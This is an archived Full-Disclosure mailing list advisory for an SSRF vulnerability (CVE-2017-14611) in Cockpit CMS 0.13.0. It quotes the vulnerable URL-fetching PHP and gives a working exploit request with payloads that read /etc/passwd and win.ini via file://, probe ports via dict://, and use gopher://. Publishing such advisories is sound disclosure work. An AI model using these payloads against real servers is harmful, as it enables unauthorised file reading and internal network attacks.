lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 4 Apr 2018 20:50:10 +0800
From: "" <>
To: fulldisclosure <>
Subject: [FD] SSRF(Server Side Request Forgery) in Cockpit CMS 0.13.0 (CVE-2017-14611)

# SSRF(Server Side Request Forgery) in Cockpit CMS 0.13.0 (CVE-2017-14611)

The Cockpit CMS is awesome if you need a flexible content structure but don't want to be limited in how to use the content.

## Product Download:

## Vulnerability Type:SSRF(Server Side Request Forgery)

## Attack Type : Remote

## Vulnerability Description

Cockpit CMS uses a `fetch_url_contents` ( code on github website, This Project has SSRF Vulnerability,So affect the system.

The vulnerability code(/assets/lib/fuc.js.php):

    if (isset($_REQUEST['url'])) {

        // allow only query from same host
        if ($_SERVER['HTTP_HOST'] != parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST)) {
            header('HTTP/1.0 401 Unauthorized');
        $url     = $_REQUEST['url'];
        $content = '';
        if (function_exists('curl_exec')){
            $conn = curl_init($url);
            curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, true);
            curl_setopt($conn, CURLOPT_FRESH_CONNECT,  true);
            curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($conn,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17');
            curl_setopt($conn, CURLOPT_AUTOREFERER, true);
            curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1);
            curl_setopt($conn, CURLOPT_VERBOSE, 0);
            $content = curl_exec($conn);
        if (!$content && function_exists('file_get_contents')){
            $content = @file_get_contents($url);
        if (!$content && function_exists('fopen') && function_exists('stream_get_contents')){
            $handle  = @fopen ($url, "r");
            $content = @stream_get_contents($handle);
        if (!$content) {
            header('HTTP/1.0 503 Service Unavailable');
        return print($content);

## Exploit

    GET /assets/lib/fuc.js.php?url=dict:// HTTP/1.1
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8

modify the above url parameter,example,file:

request http(s) protocol: url=http(s)://

file read:url=file:///etc/passwd or url=file:///c:/windows/win.ini

If the curl function is available,then use gopher、tftp、http、https、dict、ldap、file、imap、pop3、smtp、telnet protocols method,if not then only use http、https、ftp protocol

scan prot,example: url=dict:// 
use gopher protocol: url=gopher:// 

If the curl function is unavailable,this vulnerability trigger need allow\_url\_fopen option is enable in php.ini,allow\_url\_fopen option defualt is enable.

## Versions

Cockpit 0.13.0

## Impact

SSRF(Server Side Request Forgery) in Cockpit 0.13.0 version allow remote attackers to arbitrary files read,scan network port,information detection,internal network server attack.

## Credit

This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang &  National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC)

## References


Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists